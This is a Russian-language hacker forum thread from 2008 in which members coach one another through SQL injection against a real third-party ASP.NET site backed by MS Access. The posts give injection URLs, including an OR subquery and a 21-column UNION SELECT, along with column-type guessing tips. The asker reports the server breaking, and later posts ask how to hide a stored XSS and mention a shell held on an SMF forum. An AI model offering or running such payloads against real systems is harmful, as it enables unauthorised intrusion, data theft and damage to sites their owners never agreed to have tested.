 |
|
21.11.2008, 23:42
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
tempuser
помнится когда я хекал maccess делал чтото типо этого для вывода табл.
http://site.com/page.aspx?page=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('views'))--
а так бы ссылочку посмотреть )
|
|
|
21.11.2008, 23:51
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
помнится когда я хекал maccess делал чтото типо этого для вывода табл.
это был mssql, а не access
Exception Details: System.InvalidCastException: Specified cast is not valid
видимо проблемы с преобразованием типов данных, хотя для access это не свойственно. Возможное решение можно бы было найти в MS Access Cheat Sheet, но тот сайт закрыли. Ни у кого не осталось?
upd а вот нашел - http://www.xuexi123.net/chm/MS%20Access%20SQL%20Injection%20Cheat%20Sheet.htm
правда инфы по поводу преобразования типов данных нет
Последний раз редактировалось [Raz0r]; 21.11.2008 в 23:57..
|
|
|
|
21.11.2008, 23:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Time Machine
|
|
|
|
21.11.2008, 23:58
|
|
Новичок
Регистрация: 21.11.2008
Сообщений: 5
С нами:
9194194
Репутация:
0
|
|
Сообщение от sabe
tempuser
помнится когда я хекал maccess делал чтото типо этого для вывода табл.
а так бы ссылочку посмотреть )
Зачем в INFORMATION_SCHEMA.TABLES лезть то? Во первых её просто нету в access (вы с MySQL путаете :-) ), а во вторых имя нужной таблицы с пользователями известно на 100%. Также известны имена полей в этой табличке. Известна даже админка ))) Но блин тип какого то параметра походу не совпадает... И обломс.
Ссылочку - сорри. Сайт довольно дружественный, не хотелось бы случайно вандализировать :-) Ковыряюсь в нем из чистого любопытства.
Вот более подробно сообщение об ошибке:
Код:
Server Error in '/' Application.
Specified cast is not valid.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.InvalidCastException: Specified cast is not valid.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[InvalidCastException: Specified cast is not valid.]
System.Data.OleDb.OleDbDataReader.GetBoolean(Int32 ordinal) +44
ecomm.CPage.InitFromDataReader(OleDbDataReader dr)
ecomm.CPage..ctor(String ID, String PageName, String conStr)
ecomm.PageTemplateControl.get_vieName()
ecomm.PageTemplateControl.InitControl()
ecomm.TemplateControl.CreateChildControls()
System.Web.UI.Control.EnsureChildControls() +100
System.Web.UI.Control.PreRenderRecursiveInternal() +38
System.Web.UI.Control.PreRenderRecursiveInternal() +125
System.Web.UI.Control.PreRenderRecursiveInternal() +125
System.Web.UI.Control.PreRenderRecursiveInternal() +125
System.Web.UI.Page.ProcessRequestMain() +1499
Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
|
|
|
|
22.11.2008, 00:05
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+tablename%00
попробуй все числа null'ами заменить:
union select null,null,null,...
потом последовательно заменяй null на числа, строки.
Вот список функций в Access, может понадобиться:
http://www.techonthenet.com/access/functions/index_alpha.php
|
|
|
|
22.11.2008, 00:18
|
|
Новичок
Регистрация: 21.11.2008
Сообщений: 5
С нами:
9194194
Репутация:
0
|
|
попробуй все числа null'ами заменить:
Помогло :-) Правда не до конца, но похоже он ругается на четвертый параметр, при замене его на null ошибка изменяется на
Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.
|
|
|
|
22.11.2008, 00:55
|
|
Новичок
Регистрация: 21.11.2008
Сообщений: 5
С нами:
9194194
Репутация:
0
|
|
Пока ситуация такова:
1. На 2 следующих запроса
1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21
1,2,3,CDec(1),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21
отвечает Object reference not set to an instance of an object
2. На все остальное вида
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21
1,2,3,CHR(66),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21
отвечает Specified cast is not valid . Проверены int, string, byte, bool, всякие даты, CDate.
null и double... Что у них общего и чем они отличаются от int или char? Или с double уже угадал и ему не нравится что то ещё? Но если угадал, то почему ошибка на остальное не cast как раньше а object reference?
|
|
|
|
22.11.2008, 01:32
|
|
Новичок
Регистрация: 21.11.2008
Сообщений: 5
С нами:
9194194
Репутация:
0
|
|
В общем сервер немножко сломался :lol: Счас выкидывает ошибку Unspecified error прямо на главной странице сайта и в общем то не работает. Мда... Перестарались.......
|
|
|
|
22.11.2008, 19:15
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
Вопрос с активной хсс вобщем на внтутресетевом торенте нашол активную хсс. Когда делаеш раздачю в название пишеш название потом пишу хсс она пашет но она отображается в название можно её скрыть как-то ?
|
|
|
|
23.11.2008, 03:35
|
|
Новичок
Регистрация: 23.09.2008
Сообщений: 7
С нами:
9279597
Репутация:
3
|
|
Народ имееться шелл на двиге SMF 1.1.4
Когда смотрю Л.С. через базу то меня интересует когда ПМ отправилось!
А там показываеться это!
msgtime
1227282680
Как это понимать?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?955164){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?955194){kind=avatar}
Похожие темы
Линейный вид
